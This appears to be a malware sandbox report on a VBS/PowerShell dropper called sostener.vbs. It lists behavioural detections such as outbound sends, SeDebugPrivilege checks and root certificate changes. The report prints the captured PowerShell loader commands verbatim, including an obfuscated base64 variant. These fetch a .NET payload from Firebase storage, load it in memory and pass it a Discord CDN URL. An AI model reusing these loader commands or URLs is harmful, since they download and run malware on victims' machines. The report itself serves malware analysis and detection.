Data received	6U©?é}õú»ú[:'¼¨]/øwNÆ¹äÝ±ã9ÌÝØe\P2 :Ú]bK\z.äÅ\|ÒâüÀæDMÏ6 ü´`<ÒrC ñiyÞ,{èòÙKì¦î&LFTH¢ß lJßÝwBØ åïé~î½¡S2ZéQä÷yFrº àÉ%(g®:âyT_¯`»²cFÚO´kõ×#Û;¬,ÃqÅ±Â$fÌ0^3¸ò¤B¯îI¨2¯WÓtM·¸©/.içÒ-Ç$Ló«±êñþ'þ¿vàRà%.ð£2Ër" Êíùâ°'ÍÀÃõ-¯CÞT<59¤H@Z ¸í_ÛEaøs(«¶{E´Ð»4É~Ô ;µ@ó8ÁÍêÂ¶§!¬ý0\ÐîöÖºG}úÏcÂaLªFÝÝî~ááPÏ¯[rå K6ÎOEr³! mÈ+FWNÝe.ÎÛc'y×9þp£IÃg78o¿5gâ]É¸Ng\h\|äÕµÍøáIØ£¬Yâ:{ÑZð%}éÛ¬cêKøQ#YL æKÈÓÆßJYþþ\|ÃþP4@;Ùp®b{ÃÌü~ÝRg°\úåÂ}XóuÛÒ%õêÓSlÏqDumÎSn¾)jÁ´IñL~7<VïÃèbq;Vj´l]J´ùYëÇí¨0ÊÂÑI] -õîÀ-±ÓÜòuRZØÊF³0ªWnÖ¤@n×ôñ0Òõ/¬È/°

Poweshell is sending data to a remote host (3 events)

Data sent	}fµt¯ ¬ÿ£¢~ä§ÏîðÏåk²ß'ãhog/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com
Data sent	FBAà@©Äõ§? ãØ$©ÿÚU³GÕ´qçoF2æsÊÕdÈ:¿7WÅoêÕ¼ve{0»ÆÊ¥óÕæ¹1azzîûmqÄ´ 6öðsÀí8ó=MfëÛ82Mù2Ö5©
Data sent	ÐsærY2F¤¥0<Â4ùIJ?á&W¾Ç¯±qíiìHQ(va¬açvûXöu6ò¡~Âæèö¶ÔÒ0ÃÁ+Î^½oj§_~ÀZôyØ@ é-{´×8ÃL¦ÁétÄ²rWÒE°«sUðÝÿâ_B«dÕ?_x(³þÉ}<©x Î`"^¤,¤7¤c¸",¶»EÕfð<w"]_7øb¶ÖººªÛßÛP

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Aug. 9, 2024, 10:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Aug. 9, 2024, 10:45 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Attempts to create or modify system certificates (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\F81F111D0E5AB58D396F7BF525577FD30FDC95AA\Blob

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Aug. 9, 2024, 10:45 a.m.	buffer: }fµt¯ ¬ÿ£¢~ä§ÏîðÏåk²ß'ãhog/5 ÀÀÀ À 28<ÿ#!firebasestorage.googleapis.com socket: 1444 sent: 134	1	134
send Aug. 9, 2024, 10:45 a.m.	buffer: FBAà@©Äõ§? ãØ$©ÿÚU³GÕ´qçoF2æsÊÕdÈ:¿7WÅoêÕ¼ve{0»ÆÊ¥óÕæ¹1azzîûmqÄ´ 6öðsÀí8ó=MfëÛ82Mù2Ö5© socket: 1444 sent: 134	1	134
send Aug. 9, 2024, 10:45 a.m.	buffer: ÐsærY2F¤¥0<Â4ùIJ?á&W¾Ç¯±qíiìHQ(va¬açvûXöu6ò¡~Âæèö¶ÔÒ0ÃÁ+Î^½oj§_~ÀZôyØ@ é-{´×8ÃL¦ÁétÄ²rWÒE°«sUðÝÿâ_B«dÕ?_x(³þÉ}<©x Î`"^¤,¤7¤c¸",¶»EÕfð<w"]_7øb¶ÖººªÛßÛP socket: 1444 sent: 213	1	213

One or more non-whitelisted processes were created (3 events)

parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$knzaj = '0';$xfsqa = 'C:\Users\test22\AppData\Local\Temp\sostener.vbs';[Byte[]] $fpmxy = [system.Convert]::FromBase64String( (New-Object Net.WebClient).DownloadString('https://firebasestorage.googleapis.com/v0/b/rodriakd-8413d.appspot.com/o/dll%2Fdll%20Hope.txt?alt=media&token=61c829f6-e196-49e8-b4ff-041134577ffe'));[system.AppDomain]::CurrentDomain.Load($fpmxy).GetType('ClassLibrary3.Class1').GetMethod('ZxKHG').Invoke($null, [object[]] ('&3f47e92a710ca88c537fb0040b3d669d3025448b345ff3e2183eae762f15aa14=mh&4e4e4b66=si&46636b66=xe?txt.8080ivne/1853718753478211721/1545048663397590621/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $xfsqa , '____dfgn__________________-------------', $knzaj, '1', 'Roda' ));"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;
parent_process	wscript.exe	martian_process	powershell -command $ExeNy = 'J▒Br▒G4▒egBh▒Go▒I▒▒9▒C▒▒Jw▒w▒Cc▒Ow▒k▒Hg▒ZgBz▒HE▒YQ▒g▒D0▒I▒▒n▒CU▒c▒B6▒EE▒YwBP▒Gc▒SQBu▒E0▒cg▒l▒Cc▒OwBb▒EI▒eQB0▒GU▒WwBd▒F0▒I▒▒k▒GY▒c▒Bt▒Hg▒eQ▒g▒D0▒I▒Bb▒HM▒eQBz▒HQ▒ZQBt▒C4▒QwBv▒G4▒dgBl▒HI▒d▒Bd▒Do▒OgBG▒HI▒bwBt▒EI▒YQBz▒GU▒Ng▒0▒FM▒d▒By▒Gk▒bgBn▒Cg▒I▒▒o▒E4▒ZQB3▒C0▒TwBi▒Go▒ZQBj▒HQ▒I▒BO▒GU▒d▒▒u▒Fc▒ZQBi▒EM▒b▒Bp▒GU▒bgB0▒Ck▒LgBE▒G8▒dwBu▒Gw▒bwBh▒GQ▒UwB0▒HI▒aQBu▒Gc▒K▒▒n▒Gg▒d▒B0▒H▒▒cw▒6▒C8▒LwBm▒Gk▒cgBl▒GI▒YQBz▒GU▒cwB0▒G8▒cgBh▒Gc▒ZQ▒u▒Gc▒bwBv▒Gc▒b▒Bl▒GE▒c▒Bp▒HM▒LgBj▒G8▒bQ▒v▒HY▒M▒▒v▒GI▒LwBy▒G8▒Z▒By▒Gk▒YQBr▒GQ▒LQ▒4▒DQ▒MQ▒z▒GQ▒LgBh▒H▒▒c▒Bz▒H▒▒bwB0▒C4▒YwBv▒G0▒LwBv▒C8▒Z▒Bs▒Gw▒JQ▒y▒EY▒Z▒Bs▒Gw▒JQ▒y▒D▒▒S▒Bv▒H▒▒ZQ▒u▒HQ▒e▒B0▒D8▒YQBs▒HQ▒PQBt▒GU▒Z▒Bp▒GE▒JgB0▒G8▒awBl▒G4▒PQ▒2▒DE▒Yw▒4▒DI▒OQBm▒DY▒LQBl▒DE▒OQ▒2▒C0▒N▒▒5▒GU▒O▒▒t▒GI▒N▒Bm▒GY▒LQ▒w▒DQ▒MQ▒x▒DM▒N▒▒1▒Dc▒NwBm▒GY▒ZQ▒n▒Ck▒KQ▒7▒Fs▒cwB5▒HM▒d▒Bl▒G0▒LgBB▒H▒▒c▒BE▒G8▒bQBh▒Gk▒bgBd▒Do▒OgBD▒HU▒cgBy▒GU▒bgB0▒EQ▒bwBt▒GE▒aQBu▒C4▒T▒Bv▒GE▒Z▒▒o▒CQ▒ZgBw▒G0▒e▒B5▒Ck▒LgBH▒GU▒d▒BU▒Hk▒c▒Bl▒Cg▒JwBD▒Gw▒YQBz▒HM▒T▒Bp▒GI▒cgBh▒HI▒eQ▒z▒C4▒QwBs▒GE▒cwBz▒DE▒Jw▒p▒C4▒RwBl▒HQ▒TQBl▒HQ▒a▒Bv▒GQ▒K▒▒n▒Fo▒e▒BL▒Eg▒Rw▒n▒Ck▒LgBJ▒G4▒dgBv▒Gs▒ZQ▒o▒CQ▒bgB1▒Gw▒b▒▒s▒C▒▒WwBv▒GI▒agBl▒GM▒d▒Bb▒F0▒XQ▒g▒Cg▒Jw▒m▒DM▒Zg▒0▒Dc▒ZQ▒5▒DI▒YQ▒3▒DE▒M▒Bj▒GE▒O▒▒4▒GM▒NQ▒z▒Dc▒ZgBi▒D▒▒M▒▒0▒D▒▒Yg▒z▒GQ▒Ng▒2▒Dk▒Z▒▒z▒D▒▒Mg▒1▒DQ▒N▒▒4▒GI▒Mw▒0▒DU▒ZgBm▒DM▒ZQ▒y▒DE▒O▒▒z▒GU▒YQBl▒Dc▒Ng▒y▒GY▒MQ▒1▒GE▒YQ▒x▒DQ▒PQBt▒Gg▒Jg▒0▒GU▒N▒Bl▒DQ▒Yg▒2▒DY▒PQBz▒Gk▒Jg▒0▒DY▒Ng▒z▒DY▒Yg▒2▒DY▒PQB4▒GU▒PwB0▒Hg▒d▒▒u▒Dg▒M▒▒4▒D▒▒aQB2▒G4▒ZQ▒v▒DE▒O▒▒1▒DM▒Nw▒x▒Dg▒Nw▒1▒DM▒N▒▒3▒Dg▒Mg▒x▒DE▒Nw▒y▒DE▒Lw▒x▒DU▒N▒▒1▒D▒▒N▒▒4▒DY▒Ng▒z▒DM▒OQ▒3▒DU▒OQ▒w▒DY▒Mg▒x▒C8▒cwB0▒G4▒ZQBt▒Gg▒YwBh▒HQ▒d▒Bh▒C8▒bQBv▒GM▒LgBw▒H▒▒YQBk▒HI▒bwBj▒HM▒aQBk▒C4▒bgBk▒GM▒Lw▒v▒Do▒cwBw▒HQ▒d▒Bo▒Cc▒I▒▒s▒C▒▒J▒B4▒GY▒cwBx▒GE▒I▒▒s▒C▒▒JwBf▒F8▒XwBf▒GQ▒ZgBn▒G4▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒XwBf▒F8▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒t▒C0▒LQ▒n▒Cw▒I▒▒k▒Gs▒bgB6▒GE▒ag▒s▒C▒▒Jw▒x▒Cc▒L▒▒g▒Cc▒UgBv▒GQ▒YQ▒n▒C▒▒KQ▒p▒Ds▒';$KByHL = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $ExeNy.replace('▒','A') ) );$KByHL = $KByHL.replace('%pzAcOgInMr%', 'C:\Users\test22\AppData\Local\Temp\sostener.vbs');powershell -command $KByHL;

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (1 event)

file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

sostener.vbs

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All